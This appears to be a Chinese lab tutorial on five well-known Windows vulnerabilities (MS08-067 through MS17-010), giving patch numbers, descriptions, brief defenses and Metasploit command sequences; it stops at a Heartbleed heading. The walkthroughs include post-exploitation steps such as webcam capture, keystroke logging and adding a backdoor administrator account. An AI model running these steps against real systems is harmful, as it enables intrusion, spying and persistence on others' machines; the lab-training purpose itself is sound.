常见的主机漏洞

时间:2024-03-11 12:45:01

常见主机漏洞

1.MS08_067

  • 利用端口:445

    类型:缓冲区溢出漏洞、远程任意指令执行漏洞RCE

    范围:win2000、xp、server 2003、vista、server 2008、7 Beta

    补丁:KB958644

    描述:如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。

  • 操作步骤:

    环境:kali xp英文版

    利用工具 metasploit

    命令:

    msfconsole 
    
    search ms08_067
    
    use 0
    
    show options
    
    set rhosts xp\'ip
    
    show target 34(7)
    
    show payloads
    
    set payload 44
    
    run/exploit
    
  • 实验补充:

    webcam_stream 	打开摄像头返回视频流
    
    webcam_snap		打开摄像头返回照片
    
    ps							展示当前运行的进程信息
    
    migrate [pig 号]		切换进程
    
    keyscan_start 		开始键盘监听
    
    keyscan_dump		打印监听到的内容
    
    keyscan_stop 		结束键盘监听
    
    shell 进入到windows命令行下 whoami 查看当前账户是谁
    
    dir 查看文件
    
    net user hacker 123456/add
    
    net localgroup administrators hacker /add
    
    rdesktop xp\'ip 打开远程桌面登陆xp
    
  • 防御

    ​ 方法1:安装补丁

    ​ 方法2:防火墙关闭445端口

2.MS12_020

  • 利用端口:3389(RDP协议)

    类型:缓冲区溢出漏洞、远程任意指令执行漏洞RCE、拒绝服务漏洞

    范围:xp、server 2003、vista、server 2008

    补丁:KB2621440

    描述:如果攻击者向受影响的系统发送一系列特制 RDP 数据包,则这些漏洞中较严重的漏洞可能允许远程执行代码,或造成系统拒绝服务。

  • 操作步骤

    实验环境 kali、win2003

    利用工具:metasploit

    命令:

    msfconsole
    
    search ms12_020
    
    use 1
    
    show options
    
    set rhosts win2003\'ip /24
    
    run/exploit
    
    search ms12_020
    
    use 0
    
    show options
    
    set rhosts win2003\'ip
    
    run/exploit
    
  • 防御

    方法1:安装补丁

    方法2:防火墙关闭3389端口

3.MS11_003

  • 利用协议:HTTP协议
    漏洞类型:缓冲区溢出漏洞、远程任意指令执行漏洞(RCE)
    影响范围: IE6、IE7、IE8
    微软安全公告:KB2482017
    漏洞描述:
    这些漏洞可在用户使用 Internet Explorer 查看特制 Web 页面或者用户打开一个加载特制库文件的合法 HTML 文件时允许远程执行代码。

  • 操作步骤

    环境:kali win7

    工具:metasploit

  • 命令:

    - msfconsole
    
      search ms11_003
    
      use 0
    
      show options
    
      set srvhost kali\'ip
    
      show options
    
      set uripath a
    
      exploit/run
    
      sessions
    
      sessions 1
    
      shell
    
      whoami
    
    - 
    

    防御

    方法1:安装补丁
    方法2 : 使用其他浏览器的最新版本

4.MS14_064

  • 利用协议:HTTP协议
    漏洞类型:缓冲区溢出漏洞、远程任意指令执行漏洞(RCE)
    影响范围: windows2003、2008、2012、vista、win7、win8
    微软安全公告:KB3010788
    漏洞描述:
    OLE即对象连接与嵌入技术。OLE不仅是桌面应用程序集成,而且还定义和实现了一种允许应用程序作为软件“对象”彼此进行“连接”的机制。Microsoft Windows处理特制OLE对象文件的方式中存在远程代码执行漏洞,成功利用后可允许攻击者以当前用户权限执行任意代码。

  • 操作步骤

    ​ 环境kali win7

    ​ 工具 metasploit

    ​ 命令:

    msfconsole
    
    search ms14_064
    
    use 0
    
    show options
    
    show payloads
    
    set payload 50
    
    show  options
    
    set AllowPowershellPrompt true
    
    show options
    
    show targets
    
    set target 1
    
    show options
    
    run
    
    sessions
    
    sessions 1
    
    shell
    
    whoami
    
  • 防御

    方法1:安装补丁
    方法2 : 不使用IE系列浏览器

5.MS17_010

  • 利用协议:SMB
    漏洞类型:缓冲区溢出漏洞、远程任意指令执行漏洞(RCE)
    影响范围: windows2003、2008、2012、2016、vista、win7、win8、win10(1511/1607版)
    微软安全公告:KB4012598、KB4012212、KB4012215
    漏洞描述:
    如果攻击者向 Windows SMBv1 服务器发送特殊设计的消息,那么其中最严重的漏洞可能允许远程执行代码。

  • 操作步骤

    环境kali win7

    工具 metasploit

    命令:

    msfconsole
    
    search ms17_010
    
    use 1
    
    show options
    
    set rhosts win7\' ip
    
    run
    
    search
    
    use 2
    
    set rhosts win\'ip
    
    run
    
    net user hacker 123 /add
    net localgroup administrators hacker /add
    ctrl+c
    rdesktop [win7的ip]
    
    • 防御:

      安装补丁

    6.heartbleed漏洞